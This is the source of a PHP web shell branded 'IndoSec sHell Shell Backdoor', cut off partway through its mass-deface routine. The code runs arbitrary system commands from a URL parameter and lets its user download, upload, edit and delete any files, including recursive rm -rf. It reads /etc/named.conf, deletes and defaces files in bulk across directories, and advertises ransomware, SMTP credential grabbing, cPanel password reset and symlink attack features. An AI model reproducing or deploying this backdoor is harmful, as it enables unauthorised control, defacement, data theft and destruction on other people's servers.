<!doctypehtml><html><head><meta content="widht=device-widht,initial-scale=1"name="viewport"><meta content="Holiq"name="author"><meta content="{ IndoSec }"name="copyright"><title>{ IndoSec sHell }</title><link href="https://www.indsc.me/images/logo.png"rel="icon"type="image/png"><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"rel="stylesheet"><link href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"rel="stylesheet"></head><body class="text-center bg-dark text-light"><div class="container mt-5"><div class="form-group"><h1 class="text-center">{ INDOSEC }</h1><h5 class="text-center pb-5">Shell Backdoor</h5><form method="post"><input class="form-control"type="password"name="pass"placeholder="USER ID"><br><input class="btn btn-block btn-danger"class="form-control"type="submit"value="Login"></form></div></div><a class="fixed-bottom mb-3 text-muted"href="https://facebook.com/IndoSecOfficial">Copyright 2019 @ { IndoSec }</a></body></html><?php
die;
}
if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) {
if (empty($aupas) || isset($_POST["pass"]) && md5($_POST["pass"]) == $aupas) {
$_SESSION[md5($_SERVER["HTTP_HOST"])] = true;
} else {
login_shell();
}
}
if (isset($_GET["file"]) && $_GET["file"] != '' && $_GET["aksi"] == "download") {
@ob_clean();
$file = $_GET["file"];
header("Content-Description: File Transfer");
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"" . basename($file) . "\"");
header("Expires: 0");
header("Cache-Control: must-revalidate");
header("Pragma: public");
header("Content-Length: " . filesize($file));
readfile($file);
die;
}
function w($dir, $perm)
{
if (!is_writable($dir)) {
return "<font color=red>" . $perm . "</font>";
} else {
return "<font color=lime>" . $perm . "</font>";
}
}
function r($dir, $perm)
{
if (!is_readable($dir)) {
return "<font color=red>" . $perm . "</font>";
} else {
return "<font color=lime>" . $perm . "</font>";
}
}
function exe($cmd)
{
if (function_exists("system")) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif (function_exists("exec")) {
@exec($cmd, $results);
$buff = '';
foreach ($results as $result) {
$buff .= $result;
}
return $buff;
} elseif (function_exists("passthru")) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif (function_exists("shell_exec")) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 49152) == 49152) {
$info = "s";
} elseif (($perms & 40960) == 40960) {
$info = "l";
} elseif (($perms & 32768) == 32768) {
$info = "-";
} elseif (($perms & 24576) == 24576) {
$info = "b";
} elseif (($perms & 16384) == 16384) {
$info = "d";
} elseif (($perms & 8192) == 8192) {
$info = "c";
} elseif (($perms & 4096) == 4096) {
$info = "p";
} else {
$info = "u";
}
$info .= $perms & 256 ? "r" : "-";
$info .= $perms & 128 ? "w" : "-";
$info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-");
$info .= $perms & 32 ? "r" : "-";
$info .= $perms & 16 ? "w" : "-";
$info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-");
$info .= $perms & 4 ? "r" : "-";
$info .= $perms & 2 ? "w" : "-";
$info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-");
return $info;
}
if (isset($_GET["path"])) {
$path = $_GET["path"];
chdir($path);
} else {
$path = getcwd();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
if (isset($_GET["dir"])) {
$dir = $_GET["dir"];
chdir($dir);
} else {
$dir = getcwd();
}
$os = php_uname();
$ip = getHostByName(getHostName());
$ver = phpversion();
$web = $_SERVER["HTTP_HOST"];
$sof = $_SERVER["SERVER_SOFTWARE"];
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
$mysql = function_exists("mysql_connect") ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
$curl = function_exists("curl_version") ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
$total = disk_total_space($path);
$free = disk_free_space($path);
$pers = (int) ($free / $total * 100);
function formatSize($bytes)
{
$types = array("B", "KB", "MB", "GB", "TB");
for ($i = 0; $bytes >= 1024 && $i < count($types) - 1; $bytes /= 1024, $i++) {
}
return round($bytes, 2) . " " . $types[$i];
}
function ambilKata($param, $kata1, $kata2)
{
if (strpos($param, $kata1) === FALSE) {
return FALSE;
}
if (strpos($param, $kata2) === FALSE) {
return FALSE;
}
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
$d0mains = @file("/etc/named.conf", false);
if (!$d0mains) {
$die = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
$GLOBALS["need_to_update_header"] = "true";
} else {
$count = 0;
foreach ($d0mains as $d0main) {
if (@strstr($d0main, "zone")) {
preg_match_all("#zone \"(.*)\"#", $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
flush();
$count++;
}
}
}
$dom = "{$count} Domain";
}
?>
<html><head><meta content="widht=device-widht,initial-scale=1"name="viewport"><meta content="Holiq"name="author"><meta content="{ IndoSec }"name="copyright"><link href="https://www.indsc.me/images/logo.png"rel="icon"type="image/png"><title>{ IndoSec sHell }</title><link href="pojan/assets/css/bootstrap.min.css"rel="stylesheet"><link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"rel="stylesheet"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><script src="https://code.jquery.com/jquery-3.3.1.js"></script><script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script></head><body class="bg-dark text-light"><script>$(document).ready(function(){
$(window).scroll(function(){
if ($(this).scrollTop() > 700) {
$(".scrollToTop").fadeIn();
}else{
$(".scrollToTop").fadeOut();
}
});
$(".scrollToTop").click(function(){
$("html, body").animate({scrollTop : 0},1000);
return false;
});
});
$(document).ready(function() {
$('input[type="file"]').on("change", function() {
let filenames = [];
let files = document.getElementById("customFile").files;
if (files.length > 1) {
filenames.push("Total Files (" + files.length + ")");
} else {
for (let i in files) {
if (files.hasOwnProperty(i)) {
filenames.push(files[i].name);
}
}
}
$(this).next(".custom-file-label").html(filenames.join(","));
});
});</script><style>@import url(https://fonts.googleapis.com/css?family=Lato);@import url(https://fonts.googleapis.com/css?family=Quicksand);@import url(https://fonts.googleapis.com/css?family=Inconsolata);input[type=text],textarea{font-family:Inconsolata,monospace}body{margin:0;padding:0;font-family:Lato}#tab table thead th{padding:5px;font-size:16px}#tab tr{border-bottom:1px solid #fff}#tab tr:hover{background:#5b6f7d;color:#fff}#tab tr td{padding:5px}#tab tr td .badge{font-size:13px}#tab a{color:#fff}.active,.active:hover{color:#0f0}a{font-family:Quicksand;color:#fff}a:hover{color:#1e90ff}.badge{width:30px}.badge:hover{transform:scale(1.1);transition:all.3;cursor:pointer}.ico{width:25px}.ico2{width:30px}.scrollToTop{position:fixed;bottom:30px;right:30px;width:35px;height:35px;background:#262626;color:#fff;border-radius:15%;text-align:center;opacity:.5}.scrollToTop:hover{color:#fff}.up{font-size:25px;line-height:35px}.lain{color:#888;font-size:20px;margin-left:5px;top:1px}.lain:hover{color:#fff}.tambah{width:35px;height:35px;line-height:35px;border:1px solid;border-radius:50%;text-align:center}.fiture{margin:3px}.tmp th{font-size:14px}.tmp tr td{border:solid 1px #bbb;text-align:center;font-size:13px;padding:2px 5px}.tmp tr:hover{background:#5b6f7d;color:#fff}.about{color:#000}.about .card-body .img{position:relative;background:url(https://i.postimg.cc/Wb1X4xNS/image.png);background-size:cover;width:150px;height:150px}.butn{position:relative;text-align:center;padding:3px;background:rgba(225,225,225,.3);-webkit-transition:background .3s ease,color .3s ease;transition:background .3s ease,color .3s ease}input[type=radio].toggle{display:none}input[type=radio].toggle+label{cursor:pointer;margin:0 2px;width:60px}input[type=radio].toggle+label:after{position:absolute;content:"";top:0;background:#fff;height:100%;width:100%;z-index:-1;-webkit-transition:left .4s cubic-bezier(.77,0,.175,1);transition:left .4s cubic-bezier(.77,0,.175,1)}input[type=radio].toggle.toggle-left+label:after{left:100%}input[type=radio].toggle.toggle-right+label{margin-left:-5px}input[type=radio].toggle.toggle-right+label:after{left:-100%}input[type=radio].toggle:checked+label{cursor:default;color:#000;-webkit-transition:color .4s;transition:color .4s}input[type=radio].toggle:checked+label:after{left:0}</style><nav class="navbar navbar-dark static-top"><button aria-label="Toggle navigation"class="navbar-toggler"data-target="#info"data-toggle="collapse"type="button"><i class="fa fa-navicon"style="color:#fff"></i></button><div class="collapse navbar-collapse"id="info"><ul><a class="lain"href="https://facebook.com/IndoSecOfficial"><i class="fa tambah fa-facebook"></i></a> <a class="lain"href="https://www.instagram.com/indosec.id"><i class="fa tambah fa-instagram"></i></a> <a class="lain"href="https://www.youtube.com/IndoSec"><i class="fa tambah fa-youtube-play"></i></a> <a class="lain"href="https://github.com/indosecid"><i class="fa tambah fa-github"></i></a> <a class="lain"href="https://indosec.web.id"><i class="fa tambah fa-globe"></i></a></ul></div></nav><?php
echo "\n\t\t<div class=\"container\">\n\t\t\t<h1 class=\"text-center\"><a href=\"https://facebook.com/IndoSecOfficial\" style=\"color:#ffffff;\">{ INDOSEC }</h1>\n\t\t\t<center><h5>Shell Backdoor</a></h5></center>\n\t\t\t<hr/>\n\t\t\t<div class=\"text-center\">\n\t\t\t\t<div class=\"d-flex justify-content-center flex-wrap\">\n\t\t\t\t\t<a href=\"?\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-home\"></i> Home</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=upload\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-upload\"></i> Upload</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=buat_file\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-plus-circle\"></i> Buat File</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=buat_folder\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-plus\"></i> Buat Folder</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=masdef\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-exclamation-triangle\"></i> Mass Deface</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=masdel\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-trash\"></i> Mass Delete</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=jumping\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-exclamation-triangle\"></i> Jumping</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=config\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-cogs\"></i> Config</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=adminer\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-user\"></i> Adminer</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=symlink\" class=\"fiture btn btn-danger btn-sm\"><i class=\"fa fa-exclamation-circle\"></i> Symlink</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=resetpasscp\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fa fa-key\"></i> Auto Reset Cpanel</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=auteduser\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fas fa-user-edit\"></i> Auto Edit User</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=ransom\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fab fa-keycdn\"></i> Ransomware</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=smtpgrab\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fas fa fa-exclamation-circle\"></i> SMTP Grabber</a>\n\t\t\t\t\t<a href=\"?dir=" . $dir . "&aksi=bypascf\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fas fa-cloud\"></i> Bypass Cloud Flare</a>\n\t\t\t\t\t<a href=\"?about\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fa fa-info\"></i> About Us</a>\n\t\t\t\t\t<a href=\"?keluar\" class=\"fiture btn btn-warning btn-sm\"><i class=\"fa fa-sign-out\"></i> keluar</a>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-md-5\"><br/>\n\t\t\t\t\t<h5><i class=\"fa fa-terminal\"></i>Terminal : </h5>\n\t\t\t\t\t<form>\n\t\t\t\t\t\t<input type=\"text\" class=\"form-control\" name=\"cmd\" autocomplete=\"off\" placeholder=\"id | uname -a | whoami | heked\">\n\t\t\t\t\t</form>\n\t\t\t\t\t<hr style=\"backgroud: white\"/>\n\t\t\t\t\t<h5><i class=\"fa fa-search\"></i> Informasi : </h5>\n\t\t\t\t\t<div class=\"card table-responsive\">\n\t\t\t\t\t\t<div class=\"card-body\">\n\t\t\t\t\t\t\t<table class=\"table\" style=\"color: #333\">\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>PHP</td>\n\t\t\t\t\t\t\t\t\t<td> : " . $ver . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>IP Server</td>\n\t\t\t\t\t\t\t\t\t<td> : " . $ip . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>HDD</td>\n\t\t\t\t\t\t\t\t\t<td class=\"d-flex\">Total : " . formatSize($total) . " Free : " . formatSize($free) . " [" . $pers . "%]</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>Domain</td>\n\t\t\t\t\t\t\t\t\t<td>: " . $dom . '' . $die . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>MySQL</td>\n\t\t\t\t\t\t\t\t\t<td>: " . $mysql . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>cURL</td>\n\t\t\t\t\t\t\t\t\t<td>: " . $curl . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>Software</td>\n\t\t\t\t\t\t\t\t\t<td>: " . $sof . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t\t<tr>\n\t\t\t\t\t\t\t\t\t<td>Sistem Operasi</td>\n\t\t\t\t\t\t\t\t\t<td> : " . $os . "</td>\n\t\t\t\t\t\t\t\t</tr>\n\t\t\t\t\t\t\t</table>\n\t\t\t\t\t\t</div>\n\t\t\t\t\t</div><hr/>\n\t\t\t\t</div>\n\t\t\t<div class=\"col-md-7 mt-4\">";
if (isset($_GET["keluar"])) {
session_start();
session_destroy();
echo "<script>window.location=\"?\";</script>";
}
if (isset($_GET["cmd"])) {
echo "<pre class='text-white'>";
echo system($_GET["cmd"]);
echo "</pre>";
die;
}
if (isset($_GET["about"])) {
echo "<div class=\"card text-center bg-light about\">\n\t\t\t\t<h4 class=\"card-header\">{ IndoSec }</h4>\n\t\t\t\t<div class=\"card-body\">\n\t\t\t\t\t<center><div class=\"img\"></div></center>\n\t\t\t\t\t<p class=\"card-text\">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>\n\t\t\t\t</div>\n\t\t\t\t<div class=\"card-footer\">\n\t\t\t\t\t<p class=\"card-text\"><small class=\"text-muted\">Copyright 2019 { IndoSec }</small></p>\n\t\t\t\t</div>\n\t\t\t</div><br/>";
die;
}
if ($_GET["aksi"] == "chmod") {
$nama = basename($_GET["file"]);
echo "<form method='POST'>\n\t\t\t\t<h5>Chmod File : {$nama} </h5>\n\t\t\t\t<div class='form-group input-group'>\n\t\t\t\t\t<input type='text' name='perm' class='form-control' value='" . substr(sprintf("%o", fileperms($_GET["file"])), 4) . "'>\n\t\t\t\t\t<input type='submit' class='btn btn-danger form-control' value='Chmod'>\n\t\t\t\t</div>\n\t\t\t</form>";
if (isset($_POST["perm"])) {
if (chmod($_GET["file"], $_POST["perm"])) {
echo "<font color=\"lime\">Change Permission Berhasil</font><br/>";
} else {
echo "<font color=\"white\">Change Permission Gagal</font><br/>";
}
}
}
if ($_GET["aksi"] == "chmod_dir") {
$nama = basename(getcwd());
echo "<form method='POST'>\n\t\t\t\t<h5>Chmod Folder : {$nama} </h5>\n\t\t\t\t<div class='form-group input-group'>\n\t\t\t\t\t<input type='text' name='perm' class='form-control' value='" . substr(sprintf("%o", fileperms($_GET["dir"])), 4) . "'>\n\t\t\t\t\t<input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'>\n\t\t\t\t</div>\n\t\t\t</form>";
if (isset($_POST["chmo"])) {
if (chmod($_GET["dir"], $_POST["perm"])) {
echo "<font color=\"lime\">Change Permission Berhasil</font><br/>";
} else {
echo "<font color=\"white\">Change Permission Gagal</font><br/>";
}
}
}
if ($_GET["aksi"] == "upload") {
echo "<form method=\"POST\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\n\t\t\t\t<div class=\"card mt-4\">\n\t\t\t\t\t<div class=\"card-body form-group\">\n\t\t\t\t\t\t<p class=\"text-muted\">//Multiple Upload</p>\n\t\t\t\t\t\t<div class=\"custom-file\">\n\t\t\t\t\t\t\t<input type=\"file\" name=\"file[]\" multiple class=\"custom-file-input\" id=\"customFile\">\n\t\t\t\t\t\t\t<label class=\"custom-file-label\" for=\"customFile\">Choose file</label>\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t<input type=\"submit\" class=\"btn btn-sm btn-primary btn-block mt-4 p-2\" name=\"upload\" value=\"Upload\">\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</form>";
if (isset($_POST["upload"])) {
$jumlah = count($_FILES["file"]["name"]);
for ($i = 0; $i < $jumlah; $i++) {
$filename = $_FILES["file"]["name"][$i];
$up = @copy($_FILES["file"]["tmp_name"][$i], "{$dir}/" . $filename);
}
if ($jumlah < 2) {
if ($up) {
echo "<script>alert(\"Berhasil Upload " . $filename . "\");</script>";
} else {
echo "<script>alert(\"Gagal Upload!!!\");</script>";
}
} else {
echo "<script>alert(\"Berhasil Upload " . $jumlah . " File\");</script>";
}
}
}
if (isset($_GET["file"])) {
$file = $_GET["file"];
}
if ($_GET["aksi"] == "buat_file") {
echo "\n\t\t\t<h4>\n\t\t\t\t<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File: \n\t\t\t</h4>\n\t\t\t<form method='POST'>\n\t\t\t\t<input type='text' class='form-control' name='nama_file' autocomplete='off' placeholder='Nama File...'><br/>\n\t\t\t\t<textarea name='isi_file' class='form-control' rows='8' placeholder='Isi File...'></textarea><br/>\n\t\t\t\t<button type='sumbit' class='btn btn-info btn-block' name='bikin'>Bikin!!</button>\n\t\t\t</form>";
if (isset($_POST["bikin"])) {
$nama_file = $_POST["nama_file"];
$isi_file = $_POST["isi_file"];
$handle = fopen("{$nama_file}", "w");
if (fwrite($handle, $isi_file)) {
echo "<script>window.location=\"?dir=" . $dir . "\"; alert(\"Buat File Berhasil\");</script>";
} else {
echo "<script>alert(\"File Gagal Dibuat\");</script>";
}
}
}
if ($_GET["aksi"] == "view") {
echo "[ <a class=\"active\" href=\"?dir=" . $dir . "&aksi=view&file=" . $file . "\">Lihat</a> ] [ <a href=\"?dir=" . $dir . "&aksi=edit&file=" . $file . "\">Edit</a> ] [ <a href=\"?dir=" . $dir . "&aksi=rename&file=" . $file . "\">Rename</a> ] [ <a href=\"?dir=" . $dir . "&aksi=hapusf&file=" . $file . "\">Delete</a> ]";
echo "\n\t\t\t<textarea rows='9' class='form-control mb-2' disabled=''>" . htmlspecialchars(file_get_contents($file)) . "</textarea>";
}
if ($_GET["aksi"] == "edit") {
$nama = basename($file);
echo "[ <a href=\"?dir=" . $dir . "&aksi=view&file=" . $file . "\">Lihat</a> ] [ <a class=\"active\" href=\"?dir=" . $dir . "&aksi=edit&file=" . $file . "\">Edit</a> ] [ <a href=\"?dir=" . $dir . "&aksi=rename&file=" . $file . "\">Rename</a> ] [ <a href=\"?dir=" . $dir . "&aksi=hapusf&file=" . $file . "\">Delete</a> ]";
echo "<form method='POST'>\n\t\t\t\t<h5><i class='fa fa-file'></i> Edit File : {$nama}</h5>\n\t\t\t\t<textarea rows='9' class='form-control' name='isi'>" . htmlspecialchars(file_get_contents($file)) . "</textarea><br/>\n\t\t\t\t\t<button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>\n\t\t\t</form>";
if (isset($_POST["edit_file"])) {
$updt = fopen("{$file}", "w");
$hasil = fwrite($updt, $_POST["isi"]);
if ($hasil) {
echo "<script>window.location=\"?dir=" . $dir . "\"; alert(\"Berhasil Update!!\");</script>";
} else {
echo "<script>alert(\"Gagal Update!!\");</script>";
}
}
}
if ($_GET["aksi"] == "rename") {
$nama = basename($file);
echo "[ <a href=\"?dir=" . $dir . "&aksi=view&file=" . $file . "\">Lihat</a> ] [ <a href=\"?dir=" . $dir . "&aksi=edit&file=" . $file . "\">Edit</a> ] [ <a class=\"active\" href=\"?dir=" . $dir . "&aksi=rename&file=" . $file . "\">Rename</a> ] [ <a href=\"?dir=" . $dir . "&aksi=hapusf&file=" . $file . "\">Delete</a> ]";
echo "<form method='POST'>\n\t\t\t\t<h5><i class='fa fa-file'></i> Rename File : {$nama}</h5>\n\t\t\t\t<input type='text' class='form-control' name='namanew' autocomplete='off' placeholder='Masukan Nama Baru...'><br/>\n\t\t\t\t<button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button>\n\t\t\t</form>";
if (isset($_POST["rename_file"])) {
$lama = $file;
$baru = $_POST["namanew"];
rename($baru, $lama);
if (file_exists($baru)) {
echo "<script>alert(\"Nama " . $baru . " Telah Digunakan\");</script>";
} else {
if (rename($lama, $baru)) {
echo "<script>window.location=\"?dir=" . $dir . "\"; alert(\"Sukses Mengganti Nama Menjadi " . $baru . "\");</script>";
} else {
echo "<script>alert(\"Gagal Mengganti Nama\");</script>";
}
}
}
}
if ($_GET["aksi"] == "hapusf") {
$nama = basename($file);
echo "[ <a href=\"?dir=" . $dir . "&aksi=view&file=" . $file . "\">Lihat</a> ] [ <a href=\"?dir=" . $dir . "&aksi=edit&file=" . $file . "\">Edit</a> ] [ <a href=\"?dir=" . $dir . "&aksi=rename&file=" . $file . "\">Rename</a> ] [ <a class=\"active\" href=\"?dir=" . $dir . "&aksi=hapusf&file=" . $file . "\">Delete</a> ]";
echo "\n\t\t\t<div class='card card-body text-center'>\n\t\t\t\t\t<font color='black'>Yakin Menghapus : {$nama}</font>\n\t\t\t\t<br/>\n\t\t\t\t<form method='POST'>\n\t\t\t\t\t<a class='btn btn-danger btn-block' href='?dir={$dir}'>Tidak</a>\n\t\t\t\t\t<input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>\n\t\t\t\t</form>\n\t\t\t</div>";
if ($_POST["ya"]) {
$hapus = unlink($file);
if ($hapus) {
echo "<script>window.location=\"?dir=" . $dir . "\"; alert(\"Berhasil Menghapus File\");</script>";
} else {
echo "<script>alert(\"Gagal Menghapus File!\");</script>";
}
}
}
if ($_GET["aksi"] == "buat_folder") {
$output = "\n\t\t\t<h4><img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img> Buat Folder: </h4>\n\t\t\t<form method='POST'>\n\t\t\t\t<input type='text' class='form-control' name='nama_folder' autocomplete='off' placeholder='Nama Folder...'><br/>\n\t\t\t\t<button type='sumbit' class='btn btn-info btn-block' name='buat'>Buat!!</button>\n\t\t\t</form>";
echo $output;
if (isset($_POST["buat"])) {
$nama_folder = $_POST["nama_folder"];
$folder = preg_replace("([^\\w\\s\\d\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})", '', $_POST["nama_folder"]);
$fd = mkdir($folder);
if ($fd) {
echo "<script>window.location=\"?dir=" . $dir . "\"; alert(\"Berhasil Membuat Folder " . $folder . "\");</script>";
} else {
echo "echo '<script> alert('Folder " . $folder . " Gagal Dibuat');</script>";
}
}
}
if ($_GET["aksi"] == "hapus_folder") {
$nama = basename(getcwd());
$output = "\n\t\t\t[ <a href='?dir=" . $dir . "&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=" . $dir . "&aksi=hapus_folder'>Delete</a> ] \n\t\t\t<div class='card card-body text-center'>\n\t\t\t\t<font color='black'>Apakah Yakin Menghapus : {$nama} ?</font>\n\t\t\t\t<form method='POST'>\n\t\t\t\t\t<a class='btn btn-danger btn-block' href='?dir=" . dirname($dir) . "'>Tidak</a>\n\t\t\t\t\t<input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'>\n\t\t\t\t</form>\n\t\t\t</div><br/>";
echo $output;
if ($_POST["ya"]) {
if (is_dir($dir)) {
if (is_writable($dir)) {
@rmdir($dir);
@exe("rm -rf {$dir}");
@exe("rmdir /s /q {$dir}");
echo "<script>window.location='?dir=" . dirname($dir) . "'; alert('Berhasil Menghapus " . $nama . "');</script>";
} else {
echo "<script>window.location='?dir=" . dirname($dir) . "'; alert('Tidak Dapat Menghapus " . $nama . "');</script>";
}
}
}
die;
}
if ($_GET["aksi"] == "rename_folder") {
$nama = basename(getcwd());
$output = "\n\t\t\t[ <a href='?dir=" . $dir . "&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=" . $dir . "&aksi=hapus_folder'>Delete</a> ] \n\t\t\t<h4><img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img> Rename Folder : {$nama} </h4>\n\t\t\t<form method='POST'>\n\t\t\t\t<input type='text' class='form-control' name='namanew' autocomplete='off' placeholder='Masukan Nama Baru...'><br/>\n\t\t\t\t<button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>\n\t\t\t</form>";
echo $output;
if (isset($_POST["ganti"])) {
$lama = $dir;
$baru = $_POST["namanew"];
$ubah = rename($lama, $baru);
if ($ubah) {
echo "<script>window.location='?dir=" . dirname($dir) . "'; alert('Berhasil Mengganti Nama');</script>";
} else {
echo "<script>alert('Gagal Mengganti Nama');</script>";
}
}
die;
}
if ($_GET["aksi"] == "masdel") {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . "/" . $namafile;
if ($dirb === ".") {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === "..") {
if (file_exists('' . dirname($dir) . "/{$namafile}")) {
unlink('' . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if ($lokasi) {
echo "{$lokasi} > Terhapus\n";
unlink($lokasi);
$massdel = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST["start"]) {
echo "[ <a href='?dir={$dir}'>Kembali</a> ]\n\t\t\t\t<textarea class='form-control' rows='7' disabled=''>";
hapus_massal($_POST["d_dir"], $_POST["d_file"]);
echo "</textarea><br/>";
} else {
echo "<form method='post'>\n\t\t\t\t\t<h5><i class='fa fa-folder'></i> Lokasi :</h5>\n\t\t\t\t\t<input type='text' name='d_dir' value='{$dir}' class='form-control'><br>\n\t\t\t\t\t<h5><i class ='fa fa-file'></i> Nama File :</h5>\n\t\t\t\t\t<input type='text' name='d_file' autocomplete='off' placeholder='[Ex] index.php' class='form-control'><br>\n\t\t\t\t\t<input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>\n\t\t\t</form>";
}
die;
}
if ($_GET["aksi"] == "masdef") {
function tipe_massal($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . "/" . $namafile;
if ($dirb === ".") {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === "..") {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "Done > {$lokasi}\n";
file_put_contents($lokasi, $isi_script);
$masdef = tipe_massal($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function tipe_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . "/" . $namafile;
if ($dirb === ".") {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === "..") {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "Done > {$dirb}/{$namafile}\n";
file_put_contents($lokasi, $isi_script);
} else {
echo "<p>gagal</p>";
}
}
}
}
}
}
if ($_POST["start"]) {
echo "[ <a href='?dir={$dir}'>Kembali</a> ]\n\t\t\t<textarea class='form-control' rows='7' disabled=''>";
if ($_POST["tipe"] == "mahal") {
tipe_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]);
} elseif ($_POST["tipe"] == "murah") {
tipe_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]);
}
echo "</textarea><br/>";
} else {
